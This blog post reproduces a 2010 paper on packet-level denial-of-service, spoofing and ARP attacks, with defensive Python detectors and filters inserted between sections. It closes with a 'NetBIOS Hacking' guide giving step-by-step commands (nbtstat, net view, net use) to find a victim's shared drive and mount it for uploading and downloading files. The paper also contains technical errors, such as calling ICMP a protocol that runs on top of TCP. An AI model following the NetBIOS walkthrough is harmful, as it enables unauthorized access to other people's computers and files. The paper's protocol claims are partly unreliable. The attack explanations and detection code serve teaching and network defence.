
Wednesday, March 17, 2010

Packet Attacks

PACKET ATTACKS - VERSION 1.1
Let me start by saying the internet is full of wonderful tools and papers like this one. A lot of these things can help you
increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them too
much and decide to harm other people's work for no apparent reason. Let it be known that is in no way the purpose of this
paper. A true hacker is one who strives to attain the answers for themselves through curiosity. It's the path we take to
those answers that makes us hackers, not destruction of other people's work. So with that said, please enjoy my work, as I
have enjoyed writing it.
The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage?
Well, I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run-on
sentences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the
specifications of a protocol by reading its 30 page RFC document. But that is the protocol according to design; in the wild
it's a different story altogether. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP hijacking, hence the
name "Packet Attacks". This paper also focuses not just on attacks but on practical ways to prevent such attacks and ideas on
new methods to help us stop them and secure our networks.
Introduction:
TCP/IP Packet Switching Networks
OSI MODEL
---Chapter 1.---
Section a.
Introduction to DDOS/DOS & Packet Attacks
Section b.
How attacks are crafted
---Chapter 2.---
Section a. (attacks)
ICMP
Smurf
SYN/ACK
UDP
DNS
ARP
DrDOS
Special Bot / Trojans
Worm DOS
Unicode ping flood (new!)
Section b.
Phasing
Section c. (hacks)
TCP hijacking
Sniffing
Scans
Information gathering / Footprinting
Section d.
Defense against these attacks
Attack Detection
Intrusion Detection
Section e.
IPSEC
NAT as a means of security
---Chapter 3.---
Section a.
The future of TCP/IP as a means of using IPv6
---Chapter 4. ---
Section a.
New security application / protocol
-----
Introduction.
Well, I assume most of you reading this paper already have a good understanding of TCP/IP and how it works, so I won't get
too much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of
machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and
lots more. All of these devices (although some are smarter than others) push along packets. Our operating systems and
applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size,
carries a small bit of data from one host to another. Each packet must also carry its own personal information, such
as where it came from and where it's headed. Of course there is a lot more to a packet than just this information, but as far
as attacks go this is the crucial information we need to look at. Now there are many, many different types of protocols that
craft many different types of packets, and they are all read differently when they are received at the other end. Whereas
an ARP packet may tell a host who has this MAC address on this subnet, a TCP packet might transfer the last few bits of that
MP3 you're downloading. Regardless of the data, all of these packets use the same wire to move to and from locations. I
couldn't possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all
of this running in the background while they surf the net. Most people don't understand the complexity of this internet we
are all so familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that.
Reverse engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP
is so embedded in our infrastructure we must adapt and learn to defend against each new attack.
OSI MODEL
The Open Systems Interconnection model is a seven-layered networking design. It's an industry standard that defines exactly
how data is transferred from protocol to protocol. Not every protocol follows the OSI model exactly, and some do. TCP, the
internet's main mode of data transport, does not follow it exactly. Let me take you through a brief overview of the OSI model.
Layer Seven : Application Layer
This layer is obviously application specific; it provides everything from authentication to email to FTP and telnet, the
list goes on. It's specifically for end user processes: what we input into our applications we can see on our screens.
Layer Six : Presentation Layer
This layer changes and possibly encrypts the data so that the application layer can understand it. (You will understand what
this means in a few minutes.)
Layer Five : Session Layer
Think of this layer as the establishment, control and termination of the sessions formed by the
application (client) to a remote host (server).
Layer Four : Transport Layer
This layer is responsible for the invisible transfer of data from host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are UDP and TCP.
Layer Three : Network Layer
This layer is for error correction, packet sequencing, and transmitting data from node to node. Addressing is
another function of this layer in inter-networking.
Layer Two : Data Link Layer
This layer decodes and encodes packets into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers: the LLC (logical link control) and MAC
(media access control) sub-layers. The LLC sub-layer provides control for frame synchronization and error checking. The MAC
sub-layer controls how a computer on your network has access to data.
Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulses or some other form of data movement it pushes the
bit stream towards the other host. This layer is the hardware level: the ethernet card, the wire etc. There are many
protocols within this layer.
You may ask yourself why I listed these from 7 to 1. Well, I did it to show you how the OSI model really works. Layer Seven
really comes first: the end user types something into his instant messenger (for example) and the data flows down through
the OSI model, being encapsulated and changed at every level it has to be changed or corrected at. The data travels the wire
and at the other end it moves back up the OSI model all the way to layer seven, where the other host can read it in
the original form it was sent. So there's a VERY basic understanding of the OSI model and how it works to transmit data from
host to host. There are a lot more protocols and parts to the OSI model, but this basic representation should provide a firm
understanding.
To understand all of this more in depth please get your hands on a few RFC (request for comments) documents and start
reading, because it will take you a very long time to understand exactly how TCP/IP works. If you're very knowledgeable in
the way TCP/IP works then this paper should make a lot of sense to you, perhaps even bore you! On the other hand, if you
don't understand TCP/IP as well as you would like to, you still might get something out of this. I try to explain all of the
technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks
Data_Clast
---------------------------------------------------------------------------------------
Chapter 1.
Section a.
The most common attack on the internet today is a denial of service attack. There are many programs on the internet today
that will assist anyone in crafting one of these attacks. The sad part is, for as easy as they are to make, their power can
be destructive when used properly. No matter what kind of packet attack it may be, most are based on the same principle:
volume. Thousands and thousands of spoofed packets will eat up network resources within minutes, choking and essentially
'killing' any network. There are many types of packet attacks. Some are more sophisticated than others. I will also talk
about TCP/IP hijacking and your typical port and vulnerability scans, among other things.
Why do people launch these attacks? How are they launched? How exactly (technically speaking) do they 'choke a network'?!
Hold tight, I'm getting to that. The lower end of these attacks are usually launched by what the hacker community calls a
script kiddie. You see, a hacker isn't a mindless web-defacing juvenile (please see the Mentor's manifesto). A hacker is a
person of true intellect and would never craft such an attack for no reason. But these lower end attacks are usually
launched at people's individual machines. Their IP addresses may come from an IRC chat room, Yahoo Messenger, AOL, ICQ, or
whatever other messenger you might use. Although not as sophisticated, these 'lower end' attacks can still knock an
individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to
slow their sales or disrupt their outgoing internet connection. Whatever the reason may be, they are usually launched for a
reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.
The more sophisticated attacks are aimed at government and root points of the internet, such as the attacks on the root DNS
servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an
hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes, who knows the damage
it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to
none because they are created and launched by skilled malicious individuals. They were also distributed denial of service
attacks, which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more
on that later though.
Section b.
You will learn more about how these individual attacks are crafted and how they work later in this paper, but this is a
small introduction so you can get a vague idea. Creating spoofed packets requires an open socket. This socket binds to an
IP and a port and allows you to inject a packet onto the wire or accept any incoming packets to that IP and port. *NIX
openly supports open socket programming (there are many tutorials on this type of programming), which means you can code
programs that create packets and then inject them into the network with ease. An example of this would be a program called
"SENDIP", which allows you to create custom packets, and it supports many protocols (another good program is nemesis). I
have written a few tutorials using SENDIP; I think it's a great program for both advanced and new network engineers to use.
It will help you learn about packet structure and the different protocols it supports. Microsoft is not an open source
company, which pretty much makes it even harder to find help in creating these sorts of programs for Windows. But it is
possible to craft these attacks from within a Windows environment; it's referred to as 'Winsock' programming. In fact most of
these DDOS attacks are because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and other
programs that craft these attacks on servers when commanded from a client program to do so. Most end users do not understand
security and how easy it is to break into someone's home computer, so they lack firewalls and virus scanners. This leads to
many zombie machines available at hackers' disposal on the net. All one has to do is scan a class C subnet for open trojan
ports and hack their way into those trojans and use them as a backdoor; another zombie is created for attacking remote
targets. Almost every program that interacts with TCP/IP generates packets to and from places; this is valid traffic. As you
read you will distinguish the difference between valid and non-valid, as it is pretty easy to understand what I am
explaining when I say "attack". When creating an open socket and crafting spoofed packets, these programs tell the kernel
they are going to construct their own IP headers. Usually this information is put on by the kernel before the packet exits
the machine. But in this instance we are telling the kernel we want to specify our own information. Not all operating
systems will allow this. And no, I don't have a detailed list of which do and which don't. Most of the experiments I have
conducted on my network used different versions of RedHat Linux, Mandrake Linux, and Windows XP.
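Every attack in this paper starts with a packet whose source address is not the sender's own. The edge control that stops such packets from leaving a network is source-address validation (the BCP 38 idea). The following is an added example, not code from the paper: a filter over constructed packet records that forwards a packet only when its source falls inside the prefixes assigned to that network. The prefixes, the short list of never-valid source ranges and the sample packets are all assumptions made up for the demonstration.

```python
"""Source-address validation on traffic leaving a network, applied to
constructed packet records. Added example; not from the paper."""
import ipaddress
from dataclasses import dataclass

# Ranges that should never be the source of a packet leaving a customer
# network (a constructed subset, not a complete bogon list).
NEVER_SOURCE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "224.0.0.0/4", "255.255.255.255/32")]


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str  # "icmp", "tcp" or "udp"


def egress_allowed(pkt, local_nets):
    """Return (allowed, reason). A packet may leave only if its source
    belongs to one of the prefixes assigned to this network; the spoofed
    sources the attacks rely on fail this test at the edge."""
    src = ipaddress.ip_address(pkt.src)
    for bad in NEVER_SOURCE:
        if src in bad:
            return False, f"source {pkt.src} is in non-routable range {bad}"
    if not any(src in net for net in local_nets):
        return False, f"source {pkt.src} is not a local address (spoofed)"
    return True, "ok"


def filter_egress(packets, local_prefixes):
    """Split packets into (forwarded, dropped) lists of (packet, reason)."""
    nets = [ipaddress.ip_network(p) for p in local_prefixes]
    forwarded, dropped = [], []
    for pkt in packets:
        ok, why = egress_allowed(pkt, nets)
        (forwarded if ok else dropped).append((pkt, why))
    return forwarded, dropped


# Constructed sample: one real local host plus the spoofed sources used in
# the paper's diagrams (1.1.1.1 for the SYN flood, 10.2.2.2 for the Smurf).
LOCAL_PREFIXES = ["192.168.0.0/24"]
SAMPLE = [
    Packet("192.168.0.10", "203.0.113.5", "tcp"),
    Packet("1.1.1.1", "203.0.113.5", "tcp"),
    Packet("10.2.2.2", "4.1.0.255", "icmp"),
    Packet("127.0.0.1", "203.0.113.5", "udp"),
]

if __name__ == "__main__":
    kept, lost = filter_egress(SAMPLE, LOCAL_PREFIXES)
    for pkt, why in lost:
        print(f"DROP {pkt.src} -> {pkt.dst} ({pkt.proto}): {why}")
    print(f"forwarded {len(kept)}, dropped {len(lost)}")
```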
Chapter 2.
Section a.
There are several different types of packet attacks. There's the simple brute flood of ICMP packets, which floods a network
and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack.
All of these attacks target different things. While the SMURF attack may target the general network it's attacking, the
SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration that when a target
is attacked it may not be the only machine affected. There are many routers and other boxes transferring the data between
point A and point B. Other people's legitimate data is flowing between them, and may be disrupted by the packet flood. Even a
top of the line router can only handle so much data. And unfortunately it is very easy to obtain source code for these
attacks all over the web. Let's take a more detailed look at each attack.
ICMP brute flood attack.
ICMP works on top of TCP. The ICMP protocol is simple yet very effective. It's used for error correcting and testing network
connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of
arbitrary data in an ECHO_REQUEST packet it waits for a reply from the target host, simple right? A typical ICMP packet is
called an ECHO_REQUEST. You send 4 or 5 of these at a target machine and when it arrives there it requests an ECHO_REPLY.
That's when everything is done according to design. If you want more info on an ICMP packet and how it works then read my
tutorial on that!
http://www.theory-x.org/dataclast/_content/MPS.txt
In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their
destination. They reach point B and request an ECHO_REPLY for every ECHO_REQUEST sent. Point B says OK and reads the source
IP. The source IP ends up being unreachable. But point B is waiting a small amount of time (milliseconds) to determine that
for every packet that's hitting it. It will be a few more moments before the process relinquishes this small bit of memory
back to the system. This adds up to a great deal of packets and memory allocation building up. Now if these packets are
coming from multiple source zombies (DDOS) then this means they're each coming from different routes. So even if one ISP
stops one attack, there are still many more zombie machines attacking the victim. All of this is eating up time and
bandwidth, because with every millisecond that passes more and more bandwidth is being taken up. Eventually point B can no
longer keep up with the ECHO_REQUESTs and his connection is completely flooded and of no use. On an unprotected system or
router this attack can be very consuming. This attack is also sometimes referred to as a bandwidth attack. Even if the
target is running an advanced firewall, it cannot protect the wire it is connected to from being flooded with packets. There
have been changes in this attack as well. On the net there are what we call amplifiers. On every network there are the
network and subnet addresses. In many default configurations when you ping either one of these addresses they multiply the
echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or subnet address (.255) with a spoofed
source IP, being the victim's real IP. So even though the traffic becomes valid as far as IP addresses go, the victim gets
bombarded with massive ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of
those too.
[zombie machine] -->ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[??????????????] ICMP ECHO_REPLY (destination 1.1.1.1 ?)<-- [target]
Hopefully that simple drawing shows you exactly how this attack works. It's very, very simple: massive ICMP packets with
spoofed addresses taking up network resources. The simplest of attacks.
Smurf attack.
(The first part is repeated from the ICMP attack.) There have been changes in the ICMP attack. On the net there are what we
call amplifiers. On every network there are the network and subnet addresses. In many default configurations when you ping
either one of these addresses they multiply the echo requests by 4 or more. So a zombie would attack a vulnerable network
(.0) or subnet address (.255) with a spoofed source IP, being the victim's real IP. So even though the traffic becomes valid
as far as IP addresses go, the victim gets bombarded with massive ECHO_REPLY packets. You will see more of this description
in other attacks, as it works for those too.
You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine,
any machine, and ping your broadcast address. Mine is 192.168.0.255. Immediately you see each machine receiving a broadcast
packet. Now imagine it's several hundred and each one has a spoofed source IP address. It's a brute ICMP attack on a massive
scale; the possibilities for this attack are endless. You could easily implement this attack in any way you chose. You could
spoof the victim's real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though it's valid
traffic, it's 4x or more the normal load of valid traffic. This consumes the connection and valid traffic can't pass,
or passes so slowly it makes no difference to the end user.
[zombie machine] --> ICMP ECHO_REQUEST source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies the
ECHO_REPLY packets by 4x! --> --> --> --> [victim 10.2.2.2]
SYN/ACK attack.
The SYN/ACK attack is a very powerful attack. SYN/ACK packets are also used in TCP hijacking, and in the TCP/IP three way
handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection vs
connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make
a connection on a certain specified port, and then send data. When the target machine reads the SYN packet it replies to
the original host with a SYN packet of his own and an ACK (acknowledgement) packet with sequence and ack numbers. These SEQ
and ACK numbers are used to synchronize the data transfer; in case one or two packets get lost or slowed down along the
route, they can be assembled again in the correct order. The original machine replies again with another SYN ACK packet
combination acknowledging the sequence numbers and then it starts to send data. When it creates this connection a tiny
piece of memory is allocated to hold the connection while the packets are en route. Now a SYN/ACK attack would consist of
spoofing the source IP address on the original SYN packet. The target receives the request for a connection, reads the
spoofed source IP and tries to send its own SYN and ACK packet to a destination that does not exist. Most operating systems
will continue to send SYN/ACK packets if they don't receive a reply, as a method of error correction and guaranteed data
delivery. Just like in the ICMP attack, the machine has to wait a few milliseconds before abandoning all hope of reaching
the machine. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target.
This attack is very powerful and can disable a service running on the target machine in a matter of minutes. Not to mention
all the available bandwidth is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK attack in a
brief description.
[zombie machine] --> SYN packet (source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets sent (seq = 300) (ack = 101) <-- [target]
As you can see from the simple drawing above, the target machine has no idea who is sending the SYN packets and the telnet
server he is running on port 23 would most likely crash. At best the telnet daemon would not allow any other legitimate
traffic through, as it could not gather enough resources (memory, bandwidth) to make the connection due to all the spoofed
packets.
Another use of this attack is to disconnect a user from their current TCP session, by spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets; this tells the server the client is done
sending data. The client loses his connection and the attacker walks away undetected, because it only took one packet to
accomplish this.
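The "tiny piece of memory" the text describes is the half-open connection entry a server keeps between the SYN it received and the final ACK it is waiting for. A monitor that mirrors that table can tell a flood from normal load: the count of half-open entries on one port climbs while the sources never complete the handshake. The following is an added example, not the paper's code, run over a constructed capture; the timeout, the thresholds, the segment record format and the addresses are all assumptions.

```python
"""SYN-flood indicator from a half-open connection table over constructed
TCP segment records. Added example, not part of the paper."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Seg:
    t: float          # seconds since capture start
    src: str
    dst: str
    dport: int        # server port the connection is aimed at
    flags: str        # "S" = SYN, "SA" = SYN/ACK, "A" = ACK, "F" = FIN
    to_server: bool   # True when the segment heads toward the protected host


class HalfOpenTable:
    """Mirror of the per-connection allocation a server makes: an entry is
    created on SYN and released on the client's final ACK, or on timeout
    (the assumed 3 s stands in for the kernel's own retry/expiry logic)."""

    def __init__(self, timeout=3.0):
        self.timeout = timeout
        self.pending = {}        # (src, dst, dport) -> time the SYN arrived
        self.established = set()

    def feed(self, seg):
        key = (seg.src, seg.dst, seg.dport)
        if seg.to_server and seg.flags == "S":
            self.pending.setdefault(key, seg.t)   # retransmits don't refresh
        elif seg.to_server and seg.flags == "A" and key in self.pending:
            del self.pending[key]                  # handshake completed
            self.established.add(key)
        self.expire(seg.t)

    def expire(self, now):
        stale = [k for k, t0 in self.pending.items() if now - t0 > self.timeout]
        for k in stale:
            del self.pending[k]
        return len(stale)

    def half_open_by_port(self):
        out = defaultdict(list)
        for (src, _dst, dport) in self.pending:
            out[dport].append(src)
        return out


def syn_flood_indicators(segments, max_half_open=20, min_distinct_sources=10):
    """Return {port: peak half-open count} for ports whose simultaneous
    half-open connections exceed the threshold and come from many distinct
    sources (the signature of spoofed SYNs that never get acknowledged)."""
    table = HalfOpenTable()
    findings = {}
    for seg in sorted(segments, key=lambda s: s.t):
        table.feed(seg)
        for port, srcs in table.half_open_by_port().items():
            if len(srcs) >= max_half_open and len(set(srcs)) >= min_distinct_sources:
                findings[port] = max(findings.get(port, 0), len(srcs))
    return findings


def build_sample():
    """Constructed capture: one real telnet handshake to 192.168.0.1:23, then
    40 SYNs from spoofed 1.1.0.x sources whose SYN/ACKs are never answered."""
    segs = [
        Seg(0.00, "192.168.0.5", "192.168.0.1", 23, "S", True),
        Seg(0.01, "192.168.0.1", "192.168.0.5", 23, "SA", False),
        Seg(0.02, "192.168.0.5", "192.168.0.1", 23, "A", True),
    ]
    for i in range(40):
        fake = f"1.1.0.{i + 1}"
        segs.append(Seg(1.0 + i * 0.01, fake, "192.168.0.1", 23, "S", True))
        segs.append(Seg(1.0 + i * 0.01 + 0.001, "192.168.0.1", fake, 23, "SA", False))
    return segs


if __name__ == "__main__":
    for port, peak in syn_flood_indicators(build_sample()).items():
        print(f"port {port}: peak of {peak} half-open connections from spoofed sources")
```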
UDP attack
UDP is a protocol that is used to transfer data; short for USER DATAGRAM PROTOCOL. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the 3-way handshake like the SYN/ACK method,
so its initial attack may not take down a remote daemon as quickly. UDP is generally used to broadcast messages over a
network. A UDP attack would consist of spoofing the source IP addresses and specifying a port number, like in the SYN attack
above. UDP packets are generally large because they are usually used on closed 100mb subnets (LANs). So an attack would set
flags in the packets and fragment them (break them up and flag where in the packet they broke, so they can be reassembled
on the receiving end). For example, in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on
port 500. All an attacker had to do was connect to port 500 on a random machine with that port open, start sending massive
UDP packets (above 500 bytes) to that service, and the CPU usage would hit 99% and the machine would lock up. The typical
ports that accept UDP packets are 7, 13, 19 and 37 on a Windows box.
DNS attack
The DNS attack is a special one. Not as easily crafted as the others; there aren't that many tools readily available to the
average script kiddie to construct such an attack. The DNS protocol is used for name resolution: 216.239.35.100 = google.com,
simple as that? Well, not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to
create, but a DNS response is much bigger. So this is what a DNS attack would look like.
10.10.10.10 = victims IP
[dns query packet (who is google.com)] --> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns response] [dns response] [dns response] --> [victim]
As you can see, the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit',
there is a massive flood of them, because the DNS server that is sending them is a very good machine on a very good
connection. The end user, most likely a home PC, gets flooded with these huge DNS response packets it never asked for.
ARP attack
The ARP attack is a special one; it can be used to 'hijack' a TCP connection currently in session or it can be used to
sniff the legitimate traffic on a wire other than your own, which is a very dangerous thing in the information world we
live in today. There are a few methods of this attack. Let's say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server and person1 an ARP packet containing an
invalid MAC address. Now both of their ARP tables are messed up for at least 30 seconds. Server and person1 can't find that
invalid MAC address, so they send their data to the IP it's associated with, the attacker. So in this case the attacker has
a sniffer set up and he's collecting a ton of data. Now the attacker (an advanced one at that) can issue commands as person1
to the server. This attack takes timing and skill to pull off on the internet, but on a LAN it's very easy. It only allows
for maybe 30 or so seconds of sniffing, until their ARP table is constructed properly again.
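The attack above works because hosts accept whatever ARP reply arrives last. A watcher that pins the first MAC seen for each IP and flags later replies that try to rebind it (the same idea as a static ARP entry, or tools such as arpwatch) catches the poisoning within the first spoofed packet. The following is an added example, not the paper's code, run over a constructed LAN capture of the person1/server/attacker scenario; the addresses, the `solicited` flag (assumed to be set by the capture decoder when a matching request preceded the reply) and the alert shapes are assumptions.

```python
"""ARP-cache consistency check over constructed ARP replies.
Added example, not part of the paper."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    t: float
    sender_ip: str
    sender_mac: str
    solicited: bool   # assumed: True when a request for sender_ip was just seen


class ArpWatch:
    """Keep the first MAC seen for each IP and raise an alert when a later
    reply tries to rebind it, or when one MAC claims several IPs at once
    (an attacker answering for both person1 and server does exactly that)."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.alerts = []

    def feed(self, r):
        """Process one reply; return the alerts it produced (possibly none)."""
        before = len(self.alerts)
        known = self.ip_to_mac.get(r.sender_ip)
        if known is None:
            self.ip_to_mac[r.sender_ip] = r.sender_mac       # first sighting is trusted
        elif known != r.sender_mac:
            kind = "rebind" if r.solicited else "unsolicited rebind"
            self.alerts.append((r.t, kind, r.sender_ip, known, r.sender_mac))
        ips = self.mac_to_ips[r.sender_mac]
        if r.sender_ip not in ips:
            ips.add(r.sender_ip)
            if len(ips) > 1:
                self.alerts.append((r.t, "one MAC, several IPs", r.sender_mac,
                                    tuple(sorted(ips))))
        return self.alerts[before:]


def scan(replies):
    """Run every reply through a fresh watcher and return all alerts."""
    watch = ArpWatch()
    for r in sorted(replies, key=lambda x: x.t):
        watch.feed(r)
    return watch.alerts


def build_sample():
    """Constructed capture: person1 (10.0.0.5), server (10.0.0.10) and the
    attacker (10.0.0.66) answer normally, then the attacker sends unsolicited
    replies rebinding the other two IPs to his own MAC; later the real
    person1 answers again with its genuine MAC."""
    return [
        ArpReply(0.0, "10.0.0.5", "00:11:22:33:44:05", True),
        ArpReply(0.1, "10.0.0.10", "00:11:22:33:44:10", True),
        ArpReply(0.2, "10.0.0.66", "00:11:22:33:44:66", True),
        ArpReply(5.0, "10.0.0.5", "00:11:22:33:44:66", False),
        ArpReply(5.0, "10.0.0.10", "00:11:22:33:44:66", False),
        ArpReply(9.0, "10.0.0.5", "00:11:22:33:44:05", True),
    ]


if __name__ == "__main__":
    for alert in scan(build_sample()):
        print("ALERT", alert)
```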
DRDOS attack
A DRDOS attack uses a little of other attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is
some ftp, webserver, telnet.. ANY service that will reply with an ACK packet, anywhere on the internet. Could be Angelfire's
free ftp servers, could be your neighbor's web server running off his 233mhz Compaq with IIS 4.0. It doesn't matter! The SYN
packets are sent to that service's IP address and they of course reply with a steady stream of SYN/ACK packets to the
victim, most likely directed towards an open port on the victim's machine, crashing that service and the system. These
attacks are near impossible to track down. This attack is quite possibly the strongest DOS attack in my opinion. For every
SYN packet you send the middle man, it sends out up to 4 SYN/ACK combinations to the victim. And each time the victim
doesn't respond the middle man sends even more (error correction). This allows the attacker to construct a massive attack
from just one machine with a broadband connection. There are more dangers to this attack as well: there are hundreds of
thousands of FTP servers, webservers and many more services running on the net today that will deflect these SYN/ACK
packets at the victim. So in theory this attack could use any number of 'middle man' servers to bombard your network with
packets.
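The Smurf, DNS and DRDOS attacks above share one shape: the victim receives replies (ECHO_REPLY, DNS responses, SYN/ACK) to requests it never sent. From the victim's side they are all detectable the same way, by matching each inbound reply against a short window of the host's own outbound requests. The following is an added example covering all three, not code from the paper; the record format, the 2 second window, the alert threshold and the constructed traffic for protected host 10.10.10.10 are assumptions.

```python
"""Reflection/amplification detector: inbound replies that match no recent
outbound request from the protected host. Added example, not the paper's."""
from collections import defaultdict, deque
from dataclasses import dataclass

# Which inbound reply kind answers which outbound request kind.
REPLY_TO_REQUEST = {
    ("icmp", "echo_reply"): ("icmp", "echo_request"),
    ("udp/53", "dns_response"): ("udp/53", "dns_query"),
    ("tcp", "syn_ack"): ("tcp", "syn"),
}


@dataclass(frozen=True)
class Rec:
    t: float
    direction: str   # "out" (sent by the protected host) or "in"
    proto: str
    peer: str        # the remote address
    kind: str
    size: int        # bytes on the wire


class ReflectionMonitor:
    def __init__(self, window=2.0):
        self.window = window
        self.outstanding = defaultdict(deque)   # (proto, peer, kind) -> request times
        self.unsolicited = defaultdict(list)    # proto -> [(peer, size)]

    def feed(self, r):
        """Return True when r is a reply nobody here asked for."""
        if r.direction == "out":
            self.outstanding[(r.proto, r.peer, r.kind)].append(r.t)
            return False
        want = REPLY_TO_REQUEST.get((r.proto, r.kind))
        if want is None:
            return False                        # not a reply kind we track
        q = self.outstanding[(want[0], r.peer, want[1])]
        while q and r.t - q[0] > self.window:   # forget requests that aged out
            q.popleft()
        if q:
            q.popleft()                         # this reply answers a real request
            return False
        self.unsolicited[r.proto].append((r.peer, r.size))
        return True

    def report(self, min_unsolicited=10):
        """Per protocol: how many unsolicited replies, from how many
        distinct reflectors, carrying how many bytes."""
        out = {}
        for proto, hits in self.unsolicited.items():
            if len(hits) >= min_unsolicited:
                out[proto] = {"count": len(hits),
                              "reflectors": len({p for p, _ in hits}),
                              "bytes_in": sum(s for _, s in hits)}
        return out


def analyse(records, window=2.0, min_unsolicited=10):
    mon = ReflectionMonitor(window)
    for r in sorted(records, key=lambda x: x.t):
        mon.feed(r)
    return mon.report(min_unsolicited)


def build_sample():
    """Constructed traffic as seen by the protected host: one legitimate
    exchange of each kind, then a Smurf burst, a DNS reflection and a DRDOS
    stream of SYN/ACKs from servers that received spoofed SYNs."""
    recs = [
        Rec(0.00, "out", "udp/53", "192.168.0.1", "dns_query", 60),
        Rec(0.02, "in", "udp/53", "192.168.0.1", "dns_response", 180),
        Rec(0.10, "out", "icmp", "192.168.0.1", "echo_request", 64),
        Rec(0.11, "in", "icmp", "192.168.0.1", "echo_reply", 64),
        Rec(0.20, "out", "tcp", "203.0.113.80", "syn", 60),
        Rec(0.25, "in", "tcp", "203.0.113.80", "syn_ack", 60),
    ]
    for i in range(40):   # Smurf: every host on an amplifier subnet answers
        recs.append(Rec(1.0 + i * 0.01, "in", "icmp", f"4.1.0.{i + 1}", "echo_reply", 1024))
    for i in range(30):   # DNS: oversized responses from three resolvers
        recs.append(Rec(2.0 + i * 0.01, "in", "udp/53", f"198.51.100.{i % 3 + 1}", "dns_response", 512))
    for i in range(15):   # DRDOS: SYN/ACKs from five public servers
        recs.append(Rec(3.0 + i * 0.01, "in", "tcp", f"203.0.113.{i % 5 + 10}", "syn_ack", 60))
    return recs


if __name__ == "__main__":
    for proto, info in analyse(build_sample()).items():
        print(f"{proto}: {info['count']} unsolicited replies from "
              f"{info['reflectors']} reflectors, {info['bytes_in']} bytes")
```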

NetBIOS Hacking

A Guide to NetBIOS Hacking.
NetBIOS Hacking - a hacking method in which the hacker penetrates the victim through the "Sharing Files/Printer" option in the computer. The hacker can then r00t (mount) the computer's main drive or whatever drive is shared and upload/download files from it. Ultimately, YOU'RE SCREWED.
The How-To:
First, lets assume you have the IP of the victim and his/her computer is online. To make sure he/she is online, ping him/her like so:
ping xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victim's IP address.
if you get a response saying:
64 bytes from 127.0.0.1: icmp_seq=23 ttl=64 time=0.092 ms
64 bytes from 127.0.0.1: icmp_seq=24 ttl=64 time=0.098 ms
64 bytes from 127.0.0.1: icmp_seq=25 ttl=64 time=0.096 ms
or the numbers can be different, their computer is online and connected to the internet.
Now, lets see if their computer drive is on share
type this in command prompt:
nbtstat -a xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is their IP
You should get an output like so
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Computer001 <03> UNIQUE
Crap <03> UNIQUE
Computer001 <00> UNIQUE
WORKGROUP <00> GROUP
Computer001 <20> UNIQUE
---------------------------------------------
Do you see the "<20>"? If you see that on the NetBIOS table, they have sharing enabled on their computer! So far so good.
Now, lets see what disk is shared by entering this command into command prompt:
net view \\xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victim's IP address.
Now you should get a response like this:
Shared resources at \\xxx.xxx.xxx.xxx
Sharename Type Comment
______________________
TEMP Disk
C Disk
______________________
The command was completed successfully.
What we are interested in is the C disk; as we see here, the name of the shared disk is just "C". Now we can connect to it without any problems, hopefully.
To connect, type this in:
net use x: \\xxx.xxx.xxx.xxx\C
What this will do is try to mount the drive "C" from "xxx.xxx.xxx.xxx" which will be drive "X" on your computer. If this worked you should get:
The command was completed successfully
Now check your My Computer and it should be there!
Success!
Happy Hacking
